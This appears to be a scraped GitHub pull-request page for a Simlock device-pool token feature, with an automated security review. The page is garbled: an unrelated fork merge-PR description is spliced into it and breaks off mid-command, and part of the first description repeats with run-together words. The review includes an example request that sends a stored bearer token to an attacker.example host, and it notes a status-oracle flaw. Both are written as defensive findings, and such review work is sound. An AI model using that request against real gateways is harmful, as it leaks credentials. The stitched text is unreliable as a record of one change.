feat(devices): Simlock setup uses each machine's agent-device token, checks tokens, and lists the pool through worker reconnects - #26706
Adding a Simlock pool across several environments demanded an agent token for every one before anything saved, nothing checked the tokens (the iOS and Android icons were hard-coded as available), and an agent on a fleet VM found no devices at all because a momentary worker reconnect was cached for a minute.
Save what you have. The editor saves with any environment's token left blank.
Use the machine's own token. agent-device's standard remote-daemon variables, which Simlock tells its clients to set, are AGENT_DEVICE_DAEMON_BASE_URL and AGENT_DEVICE_DAEMON_AUTH_TOKEN. When an environment's base URL is <gateway>/v1/agent-device, a blank token resolves to that machine's token at run time, so the secret never leaves the server. Only that exact gateway gets it; a host pointing elsewhere still needs a token. Likewise a saved token is only ever sent to the gateway it was saved for, so editing a host's URL never sends it to the new one. A new host's URL is pre-filled from an environment that has these set.
Check each token as you enter it. A new device.simlockIdentity RPC (settings-write scope, like the EAS account check) asks the gateway's /v1/identity from each environment's server, and the editor shows "Accepted as cups", "Using this machine's agent-device token (cups)", or why not: refused, unreachable, or not an agent-role token.
Honest platform icons. When the server creates a Simlock host it fetches the catalog in the background; availability now comes from that answer (available, "The pool has no Android devices.", or the gateway failure) instead of always being available. A 401/403 now says the gateway refused the token rather than "could not reach it, or it refused the token". The row's client-side "No agent token" status is gone, since a blank token may resolve on the server.
Don't cache an empty catalog. On cups, device_list returned no Simlock devices for a minute: its one catalog request landed at 23:26:48.696, the second every pool worker reconnected, so the gateway listed no workers for any model, and T3 cached that for its 60 s TTL. A catalog is now cached only when every platform it lists has devices, so a platform whose workers are reconnecting is fetched again on the next listing.
Tests: a refused token marks platforms unavailable; saved and machine tokens go only to the gateway each belongs to (and no request goes elsewhere); a platform missing mid-reconnect is listed again on the next call. Each fails on main. The settings logic test now saves with a blank token.
…teway right away
Saving a Simlock source no longer needs an agent token for every selected
environment; a blank one shows "No agent token" with Add token on that
environment. The server now asks the gateway as soon as it creates the host,
and the platform icons show its answer instead of always being available,
with a refused token named as such.

Macroscope's review found this PR requires human approval — Simlock setup now preselects a detected gateway and uses matching machine credentials when the token field is blank. These default changes need human confirmation because they determine which identity accesses the device pool.

The change adds a Simlock identity-check RPC and settings feedback for entered, saved, or matching machine tokens. Simlock hosts use resolved tokens for gateway requests and derive platform availability from catalog results. Settings can save a host with a blank environment token.

Summary
Identity-check contracts and RPC shape packages/contracts/src/device.ts, packages/contracts/src/rpc.ts
Adds identity-check input, result, and error contracts. Registers device.simlockIdentity with its request and response schemas.
Gateway token resolution and availability apps/server/src/device/SimlockDeviceHost.ts, apps/server/src/device/SimlockDeviceHost.test.ts
Hosts resolve a saved token or a machine token when its gateway origin matches. Gateway requests use the resolved token. Catalog results and failures update platform availability. Tests cover token rejection, gateway URL matching, and catalog changes.
Identity check service and RPC wiring apps/server/src/device/DeviceService.ts, apps/server/src/ws.ts, apps/server/src/auth/RpcAuthorization.ts, apps/server/src/observability/RpcInstrumentation.ts
The service checks gateway identity and returns the identity name and token source, or an error. RPC wiring adds the handler, authorization scope, and instrumentation. Host reconciliation checks iOS availability when device support is enabled.
The editor discovers gateway URLs and displays token identity-check status. The save planner allows blank environment tokens, and host rows display the returned host status.
Device discovery can be delayed after reconnect, and settings writers can probe HTTP responses. These bounded risks merit owner awareness.

Separate catalog decoding errors from connection failures.
If the gateway returns HTTP 200 with an invalid catalog, schema decoding takes the “Could not reach” branch. If JSON decoding fails, the HTTP client error can instead produce “answered HTTP 200.” Neither message identifies the catalog failure. Classify status-code errors separately, then give decoding failures a catalog-specific reason. (effect.website)

Bind saved tokens to their configured gateway before using them here. The lookup takes agentToken by hostId but ignores that host's gatewayUrl, and resolveSimlockToken accepts a nonempty saved token unconditionally. Consequently, editing an existing host's URL automatically sends its stored bearer credential to the newly typed origin: SimlockTokenField checks each valid URL with the existing hostId, and SimlockDeviceHost.simlockIdentity sends the token to that URL's /v1/identity. A mistaken or untrusted replacement URL leaks the secret even if the user cancels without saving. Require the saved gateway to match, or require an explicitly entered token for a different origin.

Bind the saved token to its host's gateway origin.
simlockIdentity loads the saved agentToken for input.hostId. It then passes it to resolveSimlockToken(gatewayUrl, saved, environment). That function returns the saved token without comparing origins. gatewayUrl comes from input.gatewayUrl, which is any non-empty trimmed string.
A caller with settings:write scope can send { hostId: "<saved host>", gatewayUrl: "https://attacker.example" }. The server then sends the stored token as a bearer header to that URL. The schema marks this token settingsSecret: true so clients never read it back, and this path discloses it.
The same input also lets the server make authenticated requests to any http(s) URL. describeGatewayFailure reports the HTTP status, which acts as a status oracle.
The editor makes this worse. It fires the check on every valid URL change while the user types. When an existing host's saved token is in use, it can send the token to partial hostnames such as https://gateway.example.t.
Use the saved token only when the request origin matches the saved host's own gatewayUrl. Export sameOrigin from SimlockDeviceHost.ts to do this. Also constrain DeviceSimlockIdentityInput.gatewayUrl to the same https?:// origin pattern as SimlockDeviceHostConfig.gatewayUrl.

Refresh partially available catalogs after workers reconnect.
If iOS has a worker while Android workers reconnect, devices is nonempty and this caches the catalog. Android remains unavailable for up to 60 seconds after its workers return, and DeviceService.ensurePlatform rejects Android opens. Avoid caching catalogs with temporarily missing workers, or refresh an unavailable platform before rejecting it. Add a test for a partial catalog.

Merges upstream `pingdotgg/t3code` `fe219c4de1` (95 commits, base
`49a9e80e0b`) into the fork. Branched from `main`; no open merge PR to
stack on.
## Resolution
15 conflicts, each resolved by the verdict `preflight.mjs` printed for
it. The full record is in `docs/fork/upstream-merge-log.md`
(2026-10-29). The main points:
- **`LegacySidebar.tsx` deleted upstream** (pingdotgg#21039). The deletion is
taken. Its fork deltas (touch long-press, Add project gate) already live
in `Sidebar.tsx` / `SidebarThreadRow.tsx`. The file's paths are removed
from three inventory entries, and the helper only it used is dropped
from `Sidebar.logic.ts`.
- **Composer access mode.** Upstream's simpler composer (pingdotgg#25869) shows
the Access control in three places: the Permissions chip, the
compact-menu section, and the effort-menu section in
`ComposerControlsBar.tsx`. All three are gated on `FEATURES.accessMode`.
`ComposerControlsBar.tsx` is added to `chat-composer-gates`.
- **Sidebar.** Upstream's boring-sidebar project folders are combined
with the fork's browse/closed/subtask filter. Upstream moved the row's
meta line into a `metaLine` variable, and the fork's owner name and
parent/child task links now live inside it.
- **Settings.** The boring-sidebar Labs rows are client settings and are
not gated. Simlock hosts join the `serverBehaviorSettings` rows, and the
`simlock-hosts` search id is mapped to that flag. The new Fallback model
row is hidden together with the default model row
(`defaultModelSetting`).
- **`AGENTS.md`.** Upstream now has agents check user-visible changes in
a real client without asking first. The fork's version says the same,
still pointing at the fork's skills.
- `agentContextBudget.json` uses upstream's numbers, plus the fork's 108
bytes for `ProjectScript.port`. The value `46015` was measured by
running the budget test.
- `pnpm-lock.yaml` was re-derived from upstream's copy.
**Merge stats:** 595 files landed vs 593 in the upstream range (the gap
is explained in the tracker entry). Fork delta: 766 files, unchanged.
## Verification
`verify.mjs` was run in full. These checks pass: duplicate-adds,
tripwires, resolution-check, unsupported-methods, lockfile, fmt, lint,
typecheck, build. In the test step, `web` and `client-runtime` pass. The
same failures as the 2026-10-27 and 2026-10-28 merges remain, each
confirmed failing alone:
- `t3`: `RepositoryIdentityResolver`, `GitVcsDriver`,
`CodexChatGptAuth`, `CodexManagedRuntime` (the known `/tmp` sticky-bit
gap)
- `provider-opencode`: `OpenCodeServerLedger`
## Usable as-is
- Boring sidebar project folders, two-line folder rows, and hiding empty
projects (pingdotgg#21039, pingdotgg#26387, pingdotgg#26391, pingdotgg#26463)
- Simpler composer with grouped controls and effort words (pingdotgg#25869). The
access-mode parts stay gated.
- Pending approvals on their timeline row (pingdotgg#26255); tool call diffs open
in the diff panel (pingdotgg#26304); compaction row timer (3ef1610)
- Many web fixes: chat tables, inline code double-click, numbered
composer lists, image chips, scroll-to-end, tool groups after a
usage-limit pause, long-thread timeline perf (pingdotgg#26727)
- New Claude threads default to Opus 5.5 (pingdotgg#26358)
- PR files: mark viewed with shift-click, and the diff follows the file
tree (pingdotgg#26349, pingdotgg#26730). These are reachable only where the PR surface is
(`pullRequestSurface`).
## Unsupported in Moatless / needs implementation
- **GitHub sign-in through the T3 Code for GitHub app** (pingdotgg#26245):
`sourceControl.signInStart`, `signInWait`, `signInCancel`, `appAccess`.
New `UnsupportedMethodError` entries.
- **Simlock device pools** (pingdotgg#25259, pingdotgg#26706): `device.simlockIdentity`
(new union entry) and the `simlockDeviceHostsEnabled` server setting.
Part of the device hub gap.
- **Fallback model when the default provider is out of usage** (pingdotgg#26164):
the `fallbackModelSelection` server setting cannot be saved, because
`server.updateSettings` is refused. The row is hidden.
- Managing GitHub maintainer edits (pingdotgg#25588): in the pull-request write
family Moatless does not dispatch.
- T3 Connect tunnel usage and T3 Chat account push (pingdotgg#26369, pingdotgg#25931):
relay/cloud, decided out.
- Mobile dynamic workflows in the Agents sheet (pingdotgg#18642) and the mobile
app fixes: mobile against Moatless is unverified.
## Backend behavior to consider reproducing in Moatless
These are listed under _Runtime fixes upstream made to its own server_
in `docs/fork/gaps.md`:
- Falling back to another provider when the default is out of usage
(pingdotgg#26164), and refreshing usage when a turn hits its limit (pingdotgg#26234); no
replay of stale Codex usage limits (pingdotgg#26331)
- Settling a thread at once when its watched PR merges (pingdotgg#26395).
Moatless reads no PR for settlement today, so this is a decision rather
than a fix.
- Loading long thread history in bounded pages (pingdotgg#26240); publishing
local git status before the remote lookup (pingdotgg#21046); releasing completed
PR sweep data (pingdotgg#25177)
- Thread links that outside MCP clients can open (pingdotgg#26642); listing
snoozed threads across projects in one MCP call (pingdotgg#26442)
- Provider approval and subagent fixes: Claude command approvals
(pingdotgg#20145), ACP ID-only approvals (pingdotgg#26647), Cursor subagents (pingdotgg#26592),
OpenCode subagent runtime mode (pingdotgg#26302), Codex shadow-home locks
(c4606e5); shorter remote reconnect and command delays (pingdotgg#25754)
## After merging
- Disable the new upstream workflow: `gh workflow disable

Adding a Simlock pool across several environments demanded an agent token for every one before anything saved, nothing checked the tokens (the iOS and Android icons were hard-coded as available), and an agent on a fleet VM found no devices at all because a momentary worker reconnect was cached for a minute.
AGENT_DEVICE_DAEMON_BASE_URLandAGENT_DEVICE_DAEMON_AUTH_TOKEN. When an environment's base URL is<gateway>/v1/agent-device, a blank token resolves to that machine's token at run time, so the secret never leaves the server. Only that exact gateway gets it; a host pointing elsewhere still needs a token. Likewise a saved token is only ever sent to the gateway it was saved for, so editing a host's URL never sends it to the new one. A new host's URL is pre-filled from an environment that has these set.device.simlockIdentityRPC (settings-write scope, like the EAS account check) asks the gateway's/v1/identityfrom each environment's server, and the editor shows "Accepted as cups", "Using this machine's agent-device token (cups)", or why not: refused, unreachable, or not an agent-role token.device_listreturned no Simlock devices for a minute: its one catalog request landed at 23:26:48.696, the second every pool worker reconnected, so the gateway listed no workers for any model, and T3 cached that for its 60 s TTL. A catalog is now cached only when every platform it lists has devices, so a platform whose workers are reconnecting is fetched again on the next listing.Tests: a refused token marks platforms unavailable; saved and machine tokens go only to the gateway each belongs to (and no request goes elsewhere); a platform missing mid-reconnect is listed again on the next call. Each fails on main. The settings logic test now saves with a blank token.
